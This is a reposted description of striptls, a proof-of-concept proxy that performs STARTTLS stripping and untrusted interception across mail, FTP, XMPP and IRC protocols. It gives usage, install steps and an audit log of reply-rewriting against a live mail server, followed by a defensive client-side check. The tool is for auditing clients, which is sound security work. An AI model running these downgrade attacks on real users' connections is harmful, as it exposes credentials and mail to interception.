STARTTLS is an extension to plain-text communication protocols. It offers a way to upgrade a plain-text connection to an encrypted one (TLS or SSL) instead of using a separate port for encrypted communication.
striptls is a proof-of-concept (PoC) implementation of STARTTLS stripping attacks.
SMTP
- SMTP.StripFromCapabilities - server response capability patch
- SMTP.StripWithInvalidResponseCode - client STARTTLS stripping, invalid response code
- SMTP.UntrustedIntercept - STARTTLS interception (client and server talking ssl) (requires server.pem in pwd)
- SMTP.StripWithTemporaryError
- SMTP.StripWithError
- SMTP.ProtocolDowngradeStripExtendedMode
- SMTP.InjectCommand
POP3
- POP3.StripFromCapabilities
- POP3.StripWithError
- POP3.UntrustedIntercept
IMAP
- IMAP.StripFromCapabilities
- IMAP.StripWithError
- IMAP.UntrustedIntercept
- IMAP.ProtocolDowngradeToV2
FTP
- FTP.StripFromCapabilities
- FTP.StripWithError
- FTP.UntrustedIntercept
NNTP
- NNTP.StripFromCapabilities
- NNTP.StripWithError
- NNTP.UntrustedIntercept
XMPP
- XMPP.StripFromCapabilities
- XMPP.StripInboundTLS
- XMPP.UntrustedIntercept
ACAP (untested)
- ACAP.StripFromCapabilities
- ACAP.StripWithError
- ACAP.UntrustedIntercept
IRC
- IRC.StripFromCapabilities
- IRC.StripWithError
- IRC.UntrustedIntercept
- IRC.StripWithNotRegistered
- IRC.StripCAPWithNotregistered
- IRC.StripWithSilentDrop
Results:
- [*] client: 127.0.0.1
- [Vulnerable!] <class striptls.StripWithInvalidResponseCode at 0xffd3138c>
- [Vulnerable!] <class striptls.StripWithTemporaryError at 0xffd4611c>
- [ ] <class striptls.StripFromCapabilities at 0xffd316bc>
- [Vulnerable!] <class striptls.StripWithError at 0xffd4614c>
- [*] client: 192.168.139.1
- [Vulnerable!] <class striptls.StripInboundTLS at 0x7f08319a6808>
- [Vulnerable!] <class striptls.StripFromCapabilities at 0x7f08319a67a0>
- [Vulnerable!] <class striptls.UntrustedIntercept at 0x7f08319a6870>
Usage:
#> python -m striptls --help    # from pip/setup.py
#> python striptls --help       # from source / root folder
Usage: striptls [options]

       example: striptls --listen 0.0.0.0:25 --remote mail.server.tld:25

Options:
  -h, --help            show this help message and exit
  -v, --verbose         make lots of noise [default]
  -l LISTEN, --listen=LISTEN
                        listen ip:port [default: 0.0.0.0:<remote_port>]
  -r REMOTE, --remote=REMOTE
                        remote target ip:port to forward sessions to
  -k KEY, --key=KEY     SSL Certificate and Private key file to use, PEM
                        format assumed [default: server.pem]
  -x VECTORS, --vectors=VECTORS
                        Comma separated list of vectors. Use 'ALL' (default)
                        to select all vectors. Available vectors:
                        FTP.StripFromCapabilities, FTP.StripWithError,
                        FTP.UntrustedIntercept, IMAP.StripFromCapabilities,
                        IMAP.StripWithError, IMAP.UntrustedIntercept,
                        NNTP.StripFromCapabilities, NNTP.StripWithError,
                        NNTP.UntrustedIntercept, POP3.StripFromCapabilities,
                        POP3.StripWithError, POP3.UntrustedIntercept,
                        SMTP.ProtocolDowngradeStripExtendedMode,
                        SMTP.StripFromCapabilities, SMTP.StripWithError,
                        SMTP.StripWithInvalidResponseCode,
                        SMTP.StripWithTemporaryError, SMTP.UntrustedIntercept,
                        XMPP.StripFromCapabilities, XMPP.StripInboundTLS,
                        XMPP.UntrustedIntercept [default: ALL]
Installation:
1. From pip
#> pip install striptls
2. From source
#> setup.py install
Example:
                    inbound                    outbound
[inbound_peer]<------------->[listen:proxy]<------------->[outbound_peer/target]
  smtp-client                   striptls                    remote/target
A local smtp-client -> localhost:8825 (proxy) -> mail.gmx.net:25
Audit mode: for the given setup it iterates over all vectors of the protocol and tracks clients that violate the STARTTLS protocol. You can press Ctrl+C at any time to stop the audit and print the results.
#> python striptls --listen localhost:8825 --remote=mail.gmx.net:25
2016-02-02 22:11:56,275 - INFO     - <Proxy 0xffcf6d0cL listen=('localhost', 8825) target=('mail.gmx.net', 25)> ready.
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:21   , proto:  FTP): <class striptls.StripFromCapabilities at 0xffd4632c>
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:21   , proto:  FTP): <class striptls.StripWithError at 0xffd4635c>
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:21   , proto:  FTP): <class striptls.UntrustedIntercept at 0xffd4638c>
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:143  , proto: IMAP): <class striptls.StripFromCapabilities at 0xffd4626c>
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:143  , proto: IMAP): <class striptls.StripWithError at 0xffd4629c>
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:143  , proto: IMAP): <class striptls.UntrustedIntercept at 0xffd462cc>
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:119  , proto: NNTP): <class striptls.StripFromCapabilities at 0xffd463ec>
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:119  , proto: NNTP): <class striptls.StripWithError at 0xffd4641c>
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:119  , proto: NNTP): <class striptls.UntrustedIntercept at 0xffd4644c>
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:110  , proto: POP3): <class striptls.StripWithError at 0xffd461dc>
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:110  , proto: POP3): <class striptls.UntrustedIntercept at 0xffd4620c>
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:25   , proto: SMTP): <class striptls.StripFromCapabilities at 0xffd316bc>
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:25   , proto: SMTP): <class striptls.StripWithError at 0xffd4614c>
2016-02-02 22:11:56,276 - DEBUG    - * added test (port:25   , proto: SMTP): <class striptls.StripWithInvalidResponseCode at 0xffd3138c>
2016-02-02 22:11:56,276 - DEBUG    - * added test (port:25   , proto: SMTP): <class striptls.StripWithTemporaryError at 0xffd4611c>
2016-02-02 22:11:56,276 - DEBUG    - * added test (port:25   , proto: SMTP): <class striptls.UntrustedIntercept at 0xffd4617c>
2016-02-02 22:11:56,276 - DEBUG    - * added test (port:5222 , proto: XMPP): <class striptls.StripFromCapabilities at 0xffd464ac>
2016-02-02 22:11:56,276 - INFO     - <RewriteDispatcher vectors={5222: set([<class striptls.StripFromCapabilities at 0xffd464ac>]), 110: set([<class striptls.UntrustedIntercept at 0xffd4620c>, <class striptls.StripWithError at 0xffd461dc>]), 143: set([<class striptls.StripWithError at 0xffd4629c>, <class striptls.UntrustedIntercept at 0xffd462cc>, <class striptls.StripFromCapabilities at 0xffd4626c>]), 21: set([<class striptls.UntrustedIntercept at 0xffd4638c>, <class striptls.StripFromCapabilities at 0xffd4632c>, <class striptls.StripWithError at 0xffd4635c>]), 119: set([<class striptls.StripWithError at 0xffd4641c>, <class striptls.UntrustedIntercept at 0xffd4644c>, <class striptls.StripFromCapabilities at 0xffd463ec>]), 25: set([<class striptls.StripWithInvalidResponseCode at 0xffd3138c>, <class striptls.StripWithTemporaryError at 0xffd4611c>, <class striptls.StripFromCapabilities at 0xffd316bc>, <class striptls.StripWithError at 0xffd4614c>, <class striptls.UntrustedIntercept at 0xffd4617c>])}>
2016-02-02 22:12:08,477 - DEBUG    - <ProtocolDetect 0xffcf6eccL protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)
2016-02-02 22:12:08,530 - INFO     - <Session 0xffcf6e4cL> client ('127.0.0.1', 28902) has connected
2016-02-02 22:12:08,530 - INFO     - <Session 0xffcf6e4cL> connecting to target ('mail.gmx.net', 25)
2016-02-02 22:12:08,805 - DEBUG    - <Session 0xffcf6e4cL> [client] <= [server]          '220 gmx.com (mrgmx001) Nemesis ESMTP Service ready\r\n'
2016-02-02 22:12:08,805 - DEBUG    - <RewriteDispatcher  - changed mangle: striptls.StripWithInvalidResponseCode new: True>
2016-02-02 22:12:09,759 - DEBUG    - <Session 0xffcf6e4cL> [client] => [server]          'ehlo [192.168.139.1]\r\n'
2016-02-02 22:12:09,850 - DEBUG    - <Session 0xffcf6e4cL> [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
2016-02-02 22:12:09,851 - DEBUG    - <Session 0xffcf6e4cL> [client] <= [server][mangled] '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250-STARTTLS\r\n250 STARTTLS\r\n'
2016-02-02 22:12:09,867 - DEBUG    - <Session 0xffcf6e4cL> [client] => [server]          'STARTTLS\r\n'
2016-02-02 22:12:09,867 - DEBUG    - <Session 0xffcf6e4cL> [client] <= [server][mangled] '200 STRIPTLS\r\n'
2016-02-02 22:12:09,867 - DEBUG    - <Session 0xffcf6e4cL> [client] => [server][mangled] None
2016-02-02 22:12:09,883 - DEBUG    - <Session 0xffcf6e4cL> [client] => [server]          'mail FROM:<a@b.com> size=10\r\n'
2016-02-02 22:12:09,983 - DEBUG    - <Session 0xffcf6e4cL> [client] <= [server]          '530 Authentication required\r\n'
2016-02-02 22:12:09,992 - DEBUG    - <Session 0xffcf6e4cL> [client] => [server]          'rset\r\n'
2016-02-02 22:12:10,100 - DEBUG    - <Session 0xffcf6e4cL> [client] <= [server]          '250 OK\r\n'
2016-02-02 22:12:10,116 - WARNING  - <Session 0xffcf6e4cL> terminated.
2016-02-02 22:12:13,056 - DEBUG    - <ProtocolDetect 0xffd0920cL protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)
2016-02-02 22:12:13,056 - INFO     - <Session 0xffd0918cL> client ('127.0.0.1', 28905) has connected
2016-02-02 22:12:13,057 - INFO     - <Session 0xffd0918cL> connecting to target ('mail.gmx.net', 25)
2016-02-02 22:12:13,241 - DEBUG    - <Session 0xffd0918cL> [client] <= [server]          '220 gmx.com (mrgmx003) Nemesis ESMTP Service ready\r\n'
2016-02-02 22:12:13,241 - DEBUG    - <RewriteDispatcher  - changed mangle: striptls.StripWithTemporaryError new: True>
2016-02-02 22:12:14,197 - DEBUG    - <Session 0xffd0918cL> [client] => [server]          'ehlo [192.168.139.1]\r\n'
2016-02-02 22:12:14,289 - DEBUG    - <Session 0xffd0918cL> [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
2016-02-02 22:12:14,304 - DEBUG    - <Session 0xffd0918cL> [client] => [server]          'STARTTLS\r\n'
2016-02-02 22:12:14,305 - DEBUG    - <Session 0xffd0918cL> [client] <= [server][mangled] '454 TLS not available due to temporary reason\r\n'
2016-02-02 22:12:14,305 - DEBUG    - <Session 0xffd0918cL> [client] => [server][mangled] None
2016-02-02 22:12:14,320 - DEBUG    - <Session 0xffd0918cL> [client] => [server]          'mail FROM:<a@b.com> size=10\r\n'
2016-02-02 22:12:14,411 - DEBUG    - <Session 0xffd0918cL> [client] <= [server]          '530 Authentication required\r\n'
2016-02-02 22:12:14,415 - DEBUG    - <Session 0xffd0918cL> [client] => [server]          'rset\r\n'
2016-02-02 22:12:14,520 - DEBUG    - <Session 0xffd0918cL> [client] <= [server]          '250 OK\r\n'
2016-02-02 22:12:14,535 - WARNING  - <Session 0xffd0918cL> terminated.
2016-02-02 22:12:16,649 - DEBUG    - <ProtocolDetect 0xffd092ecL protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)
2016-02-02 22:12:16,650 - INFO     - <Session 0xffd0926cL> client ('127.0.0.1', 28908) has connected
2016-02-02 22:12:16,650 - INFO     - <Session 0xffd0926cL> connecting to target ('mail.gmx.net', 25)
2016-02-02 22:12:16,820 - DEBUG    - <Session 0xffd0926cL> [client] <= [server]          '220 gmx.com (mrgmx003) Nemesis ESMTP Service ready\r\n'
2016-02-02 22:12:16,820 - DEBUG    - <RewriteDispatcher  - changed mangle: striptls.StripFromCapabilities new: True>
2016-02-02 22:12:17,760 - DEBUG    - <Session 0xffd0926cL> [client] => [server]          'ehlo [192.168.139.1]\r\n'
2016-02-02 22:12:17,849 - DEBUG    - <Session 0xffd0926cL> [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
2016-02-02 22:12:17,849 - DEBUG    - <Session 0xffd0926cL> [client] <= [server][mangled] '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250 AUTH LOGIN PLAIN\r\n'
2016-02-02 22:12:17,871 - WARNING  - <Session 0xffd0926cL> terminated.
2016-02-02 22:12:20,071 - DEBUG    - <ProtocolDetect 0xffd093ccL protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)
2016-02-02 22:12:20,072 - INFO     - <Session 0xffd0934cL> client ('127.0.0.1', 28911) has connected
2016-02-02 22:12:20,072 - INFO     - <Session 0xffd0934cL> connecting to target ('mail.gmx.net', 25)
2016-02-02 22:12:20,239 - DEBUG    - <Session 0xffd0934cL> [client] <= [server]          '220 gmx.com (mrgmx002) Nemesis ESMTP Service ready\r\n'
2016-02-02 22:12:20,240 - DEBUG    - <RewriteDispatcher  - changed mangle: striptls.StripWithError new: True>
2016-02-02 22:12:21,181 - DEBUG    - <Session 0xffd0934cL> [client] => [server]          'ehlo [192.168.139.1]\r\n'
2016-02-02 22:12:21,269 - DEBUG    - <Session 0xffd0934cL> [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
2016-02-02 22:12:21,280 - DEBUG    - <Session 0xffd0934cL> [client] => [server]          'STARTTLS\r\n'
2016-02-02 22:12:21,281 - DEBUG    - <Session 0xffd0934cL> [client] <= [server][mangled] '501 Syntax error\r\n'
2016-02-02 22:12:21,281 - DEBUG    - <Session 0xffd0934cL> [client] => [server][mangled] None
2016-02-02 22:12:21,289 - DEBUG    - <Session 0xffd0934cL> [client] => [server]          'mail FROM:<a@b.com> size=10\r\n'
2016-02-02 22:12:21,381 - DEBUG    - <Session 0xffd0934cL> [client] <= [server]          '530 Authentication required\r\n'
2016-02-02 22:12:21,386 - DEBUG    - <Session 0xffd0934cL> [client] => [server]          'rset\r\n'
2016-02-02 22:12:21,469 - DEBUG    - <Session 0xffd0934cL> [client] <= [server]          '250 OK\r\n'
2016-02-02 22:12:21,485 - WARNING  - <Session 0xffd0934cL> terminated.
2016-02-02 22:12:23,665 - WARNING  - Ctrl C - Stopping server
2016-02-02 22:12:23,665 - INFO     -  -- audit results --
2016-02-02 22:12:23,666 - INFO     - [*] client: 127.0.0.1
2016-02-02 22:12:23,666 - INFO     -     [Vulnerable!] <class striptls.StripWithInvalidResponseCode at 0xffd3138c>
2016-02-02 22:12:23,666 - INFO     -     [Vulnerable!] <class striptls.StripWithTemporaryError at 0xffd4611c>
2016-02-02 22:12:23,666 - INFO     -     [ ] <class striptls.StripFromCapabilities at 0xffd316bc>
2016-02-02 22:12:23,666 - INFO     -     [Vulnerable!] <class striptls.StripWithError at 0xffd4614c>
Besides audit mode, the tool can also strip STARTTLS from the server's capabilities, invalidate the STARTTLS response, perform an untrusted SSL interception (which only works against clients that do not verify whether the server's certificate is trusted), and trace and audit XMPP sessions.
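As an added example (not striptls code), the client side of the four SMTP checks in the audit above: a TLS-requiring client that parses the EHLO reply and the STARTTLS response and aborts instead of continuing in plaintext, which is what turns each "[Vulnerable!]" line into a "[ ]". The sample replies are constructed after the log lines above, and the function names are this example's own.

```python
import re
import ssl

# Constructed samples modelled on the EHLO replies in the audit log above.
CLEAN_EHLO = ("250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n"
              "250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n")
STRIPPED_EHLO = ("250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n"
                 "250-SIZE 31457280\r\n250 AUTH LOGIN PLAIN\r\n")

class TlsRequired(Exception):
    """Raised when the session must be aborted instead of continuing in plaintext."""

def parse_ehlo(response):
    """Return the advertised EHLO keywords; raise on anything but a well-formed 250 reply."""
    lines = [l for l in response.split("\r\n") if l]
    keywords = []
    for i, line in enumerate(lines):
        m = re.match(r"^(\d{3})([ -])(.*)$", line)
        if not m or m.group(1) != "250":
            raise TlsRequired("unexpected EHLO line: %r" % line)
        # '250-' marks a continuation line; '250 ' is only valid as the final line
        if (m.group(2) == " ") != (i == len(lines) - 1):
            raise TlsRequired("inconsistent multiline EHLO reply")
        words = m.group(3).split()
        if i > 0 and words:              # line 0 is the greeting, not a capability
            keywords.append(words[0].upper())
    return keywords

def client_decision(ehlo_response, starttls_reply=None):
    """Decide what a TLS-requiring client does after EHLO and (if sent) STARTTLS.
    Only a 220 reply permits the handshake; anything else aborts, so MAIL FROM / AUTH
    are never sent in plaintext whichever of the vectors above a proxy used."""
    try:
        if "STARTTLS" not in parse_ehlo(ehlo_response):
            raise TlsRequired("STARTTLS not advertised")          # StripFromCapabilities
        if starttls_reply is None:
            raise TlsRequired("no reply to STARTTLS")
        m = re.match(r"^(\d{3})[ -]", starttls_reply)
        if not m or m.group(1) != "220":                          # 200 / 454 / 501 variants
            raise TlsRequired("STARTTLS not accepted: %r" % starttls_reply.strip())
    except TlsRequired as e:
        return "abort: %s" % e
    return "handshake"

def tls_context():
    """Context for the handshake: the default verifies chain and hostname (UntrustedIntercept)."""
    return ssl.create_default_context()

if __name__ == "__main__":
    print(client_decision(CLEAN_EHLO, "220 OK\r\n"), "|", client_decision(STRIPPED_EHLO))
```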
The introduction above is taken from FreeBuf (FreeBuf.COM).